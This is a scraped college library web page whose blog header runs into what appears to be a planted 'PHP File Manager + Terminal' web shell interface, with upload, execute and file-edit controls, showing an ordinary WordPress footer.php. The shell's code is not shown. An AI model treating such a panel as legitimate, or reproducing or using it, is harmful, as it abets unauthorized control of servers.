Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/understrap Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/understrap/footer.php<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after * * @package Understrap */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; $container = get_theme_mod( 'understrap_container_type' ); ?> <?php get_template_part( 'sidebar-templates/sidebar', 'footerfull' ); ?> <div class="wrapper" id="wrapper-footer"> <div class="<?php echo esc_attr( $container ); ?>"> <div class="row"> <div class="col-md-12"> <footer class="site-footer" id="colophon"> <div class="site-info"> <?php understrap_site_info(); ?> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- col --> </div><!-- .row --> </div><!-- .container(-fluid) --> </div><!-- #wrapper-footer --> <?php // Closing div#page from header.php. ?> </div><!-- #page --> <?php wp_footer(); ?> </body> </html> Save